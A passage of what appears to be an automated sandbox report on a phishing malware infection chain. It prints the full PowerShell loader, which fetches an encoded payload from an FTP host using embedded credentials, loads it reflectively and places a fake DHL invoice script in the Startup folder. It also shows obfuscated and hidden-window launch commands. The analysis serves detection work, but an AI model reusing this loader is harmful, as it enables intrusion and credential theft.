'\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ajvsujdnntiralmilkxwkxswwkf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\lladutngjbaekramcnkpuknfxzxbri"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $qkkzc = 'ow' + [char]66 + '9adsakqagackaiaanaeqamq' + [char]66 + 'eacaaraanacaalaagafgaua' + [char]66 + 'vahuaaaakacaalaagaccaaa' + [char]66 + '0ahqaca' + [char]66 + 'zadoalwavagiamg' + [char]66 + 'jageacw' + [char]66 + 'lac4ayw' + [char]66 + 'vag0alw' + [char]66 + 'jagwayq' + [char]66 + 'zahmalg' + [char]66 + '0ahgadaanacaakaagaf0axq' + [char]66 + 'bahqayw' + [char]66 + 'lagoayg' + [char]66 + 'vafsaiaasacaaba' + [char]66 + 'sahuabgakacaaka' + [char]66 + 'lagsabw' + [char]66 + '2ag4asqauackaiaanaekavg' + [char]66 + 'gahiacaanacaaka' + [char]66 + 'kag8aaa' + [char]66 + '0aguatq' + [char]66 + '0aguarwauackajwaxahmacw' + [char]66 + 'hagwaqwauadmaeq' + [char]66 + 'yageacg' + [char]66 + 'iagkata' + [char]66 + 'zahmayq' + [char]66 + 'saemajwaoaguaca' + [char]66 + '5afqada' + [char]66 + 'laecalgapacaawg' + [char]66 + 'jaeiayw' + [char]66 + 'hacqaiaaoagqayq' + [char]66 + 'vaewalg' + [char]66 + 'uagkayq' + [char]66 + 'tag8ara' + [char]66 + '0ag4azq' + [char]66 + 'yahiadq' + [char]66 + 'dadoaog' + [char]66 + 'dag4aaq' + [char]66 + 'hag0abw' + [char]66 + 'eahaaca' + [char]66 + '' + [char]66 + 'ac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwa7ackaiaapacaajw' + [char]66 + '' + [char]66 + 'accaiaasacaajwctitoakyenacaaka' + [char]66 + 'lagmayq' + [char]66 + 'sahaazq' + [char]66 + 'sac4azw' + [char]66 + 'tahoaqw' + [char]66 + 'cagwajaagacgazw' + [char]66 + 'uagkacg' + [char]66 + '0afmanaa2aguacw' + [char]66 + 'haeiabq' + [char]66 + 'vahiarga6adoaxq' + [char]66 + '0ahiazq' + [char]66 + '2ag4abw' + [char]66 + 'dac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwagad0aia' + [char]66 + 'aagmaqg' + [char]66 + 'jageajaagaf0axq' + [char]66 + 'baguada' + [char]66 + '5aeiawwa7accajq' + [char]66 + 'jaggacq' + [char]66 + 'safgajqanacaapqagafgaua' + [char]66 + 'vahuaaaakadsakqagagcauw' + [char]66 + '6aemaqg' + [char]66 + 'sacqaiaaoagcabg' + [char]66 + 'pahiada' + [char]66 + 'tagqayq' + [char]66 + 'vagwabg' + [char]66 + '3ag8araauahoaea' + [char]66 + 'iagsabqakacaapqagagcauw' + [char]66 + '6aemaqg' + [char]66 + 'sacqaowa4aeyava' + [char]66 + 'vadoaog' + [char]66 + 'dagcabg' + [char]66 + 'pagqabw' + [char]66 + 'jag4arqauahqaea' + [char]66 + 'lafqalg' + [char]66 + 'taguada' + [char]66 + 'zahkauw' + [char]66 + 'bacaapqagagcabg' + [char]66 + 'pagqabw' + [char]66 + 'jag4arqauahoaea' + [char]66 + 'iagsabqakadsakq' + [char]66 + '0ag4azq' + [char]66 + 'pagwaqw' + [char]66 + 'iaguavwauahqazq' + [char]66 + 'oacaada' + [char]66 + 'jaguaag' + [char]66 + 'iae8alq' + [char]66 + '3aguatgaoacaapqagahoaea' + [char]66 + 'iagsabqakadsakqaoaguacw' + [char]66 + 'vahaacw' + [char]66 + 'pagqalg' + [char]66 + '6ahgayg' + [char]66 + 'rag0ajaa7ackaiaanahqaea' + [char]66 + '0ac4amqawaewata' + [char]66 + 'eac8amqawac8acg' + [char]66 + 'lahqaca' + [char]66 + '5ahiayw' + [char]66 + 'wafualw' + [char]66 + 'yagialg' + [char]66 + 'tag8aywauahqayq' + [char]66 + 'yagiadg' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $qdrfv = $host.version.major.equals(2) ;if ( $qdrfv ) {$tzwou = [system.io.path]::gettemppath();del ( $tzwou + '\upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qvgwd = $env:processor_architecture.contains('64') ;if ( $qvgwd ) {$rrlqq = ($rrlqq + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$rrlqq = ($rrlqq + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$yzdrg = (new-object net.webclient);$yzdrg.encoding = [system.text.encoding]::utf8;$yzdrg.downloadfile($urlkb, $tzwou + '\upwin.msu');$mcydf = ('c:\users\' + [environment]::username );tkplb = ($tzwou + '\upwin.msu'); powershell.exe wusa.exe tkplb /quiet /norestart ; copy-item 'c:\users\user\desktop\dhlshippinginvoicesawbbl000000000102220242247.vbs' -destination ( $mcydf + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$mkbxz = (new-object net.webclient);$mkbxz.encoding = [system.text.encoding]::utf8;$mkbxz.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lbczsg = $mkbxz.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$mkbxz.dispose();$mkbxz = (new-object net.webclient);$mkbxz.encoding = [system.text.encoding]::utf8;$lbczsg = $mkbxz.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\dhlshippinginvoicesawbbl000000000102220242247.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' , 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huupx , 'd d1d' ) );};"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\roaming\program rules nvideo\update drivers nvideo\update drivers nvideo\update drivers nvideo\qkbrq.ps1' ";exit
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\roaming\program rules nvideo\update drivers nvideo\update drivers nvideo\update drivers nvideo\qkbrq.ps1' ";exit
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\roaming\program rules nvideo\update drivers nvideo\update drivers nvideo\update drivers nvideo\qkbrq.ps1' ";exit
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\roaming\program rules nvideo\update drivers nvideo\update drivers nvideo\update drivers nvideo\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $qkkzc = 'ow' + [char]66 + '9adsakqagackaiaanaeqamq' + [char]66 + 'eacaaraanacaalaagafgaua' + [char]66 + 'vahuaaaakacaalaagaccaaa' + [char]66 + '0ahqaca' + [char]66 + 'zadoalwavagiamg' + [char]66 + 'jageacw' + [char]66 + 'lac4ayw' + [char]66 + 'vag0alw' + [char]66 + 'jagwayq' + [char]66 + 'zahmalg' + [char]66 + '0ahgadaanacaakaagaf0axq' + [char]66 + 'bahqayw' + [char]66 + 'lagoayg' + [char]66 + 'vafsaiaasacaaba' + [char]66 + 'sahuabgakacaaka' + [char]66 + 'lagsabw' + [char]66 + '2ag4asqauackaiaanaekavg' + [char]66 + 'gahiacaanacaaka' + [char]66 + 'kag8aaa' + [char]66 + '0aguatq' + [char]66 + '0aguarwauackajwaxahmacw' + [char]66 + 'hagwaqwauadmaeq' + [char]66 + 'yageacg' + [char]66 + 'iagkata' + [char]66 + 'zahmayq' + [char]66 + 'saemajwaoaguaca' + [char]66 + '5afqada' + [char]66 + 'laecalgapacaawg' + [char]66 + 'jaeiayw' + [char]66 + 'hacqaiaaoagqayq' + [char]66 + 'vaewalg' + [char]66 + 'uagkayq' + [char]66 + 'tag8ara' + [char]66 + '0ag4azq' + [char]66 + 'yahiadq' + [char]66 + 'dadoaog' + [char]66 + 'dag4aaq' + [char]66 + 'hag0abw' + [char]66 + 'eahaaca' + [char]66 + '' + [char]66 + 'ac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwa7ackaiaapacaajw' + [char]66 + '' + [char]66 + 'accaiaasacaajwctitoakyenacaaka' + [char]66 + 'lagmayq' + [char]66 + 'sahaazq' + [char]66 + 'sac4azw' + [char]66 + 'tahoaqw' + [char]66 + 'cagwajaagacgazw' + [char]66 + 'uagkacg' + [char]66 + '0afmanaa2aguacw' + [char]66 + 'haeiabq' + [char]66 + 'vahiarga6adoaxq' + [char]66 + '0ahiazq' + [char]66 + '2ag4abw' + [char]66 + 'dac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwagad0aia' + [char]66 + 'aagmaqg' + [char]66 + 'jageajaagaf0axq' + [char]66 + 'baguada' + [char]66 + '5aeiawwa7accajq' + [char]66 + 'jaggacq' + [char]66 + 'safgajqanacaapqagafgaua' + [char]66 + 'vahuaaaakadsakqagagcauw' + [char]66 + '6aemaqg' + [char]66 + 'sacqaiaaoagcabg' + [char]66 + 'pahiada' + [char]66 + 'tagqayq' + [char]66 + 'vagwabg' + [char]66 + '3ag8araauahoaea' + [char]66 + 'iagsabqakacaapqagagcauw' + [char]66 + '6aemaqg' + [char]66 + 'sacqaowa4aeyava' + [char]66 + 'vadoaog' + [char]66 + 'dagcabg' + [char]66 + 'pagqabw' + [char]66 + 'jag4arqauahqaea' + [char]66 + 'lafqalg' + [char]66 + 'taguada' + [char]66 + 'zahkauw' + [char]66 + 'bacaapqagagcabg' + [char]66 + 'pagqabw' + [char]66 + 'jag4arqauahoaea' + [char]66 + 'iagsabqakadsakq' + [char]66 + '0ag4azq' + [char]66 + 'pagwaqw' + [char]66 + 'iaguavwauahqazq' + [char]66 + 'oacaada' + [char]66 + 'jaguaag' + [char]66 + 'iae8alq' + [char]66 + '3aguatgaoacaapqagahoaea' + [char]66 + 'iagsabqakadsakqaoaguacw' + [char]66 + 'vahaacw' + [char]66 + 'pagqalg' + [char]66 + '6ahgayg' + [char]66 + 'rag0ajaa7ackaiaanahqaea' + [char]66 + '0ac4amqawaewata' + [char]66 + 'eac8amqawac8acg' + [char]66 + 'lahqaca' + [char]66 + '5ahiayw' + [char]66 + 'wafualw' + [char]66 + 'yagialg' + [char]66 + 'tag8aywauahqayq' + [char]66 + 'yagiadg' + [chJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $qdrfv = $host.version.major.equals(2) ;if ( $qdrfv ) {$tzwou = [system.io.path]::gettemppath();del ( $tzwou + '\upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qvgwd = $env:processor_architecture.contains('64') ;if ( $qvgwd ) {$rrlqq = ($rrlqq + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$rrlqq = ($rrlqq + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$yzdrg = (new-object net.webclient);$yzdrg.encoding = [system.text.encoding]::utf8;$yzdrg.downloadfile($urlkb, $tzwou + '\upwin.msu');$mcydf = ('c:\users\' + [environment]::username );tkplb = ($tzwou + '\upwin.msu'); powershell.exe wusa.exe tkplb /quiet /norestart ; copy-item 'c:\users\user\desktop\dhlshippinginvoicesawbbl000000000102220242247.vbs' -destination ( $mcydf + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$mkbxz = (new-object net.webclient);$mkbxz.encoding = [system.text.encoding]::utf8;$mkbxz.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lbczsg = $mkbxz.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$mkbxz.dispose();$mkbxz = (new-object net.webclient);$mkbxz.encoding = [system.text.encoding]::utf8;$lbczsg = $mkbxz.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\dhlshippinginvoicesawbbl000000000102220242247.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' , 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huupx , 'd d1d' ) );};"Jump to behavior
                    Source: AddInProcess32.exe, 00000015.00000002.3074510288.0000000000F18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: AddInProcess32.exe, 00000015.00000002.3074510288.0000000000F18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager32\cmd.exeiF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_10002933 cpuid 21_2_10002933
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,23_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,23_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,23_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,23_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,23_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,23_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,23_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,23_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,23_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,23_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,23_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,23_2_00451FD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
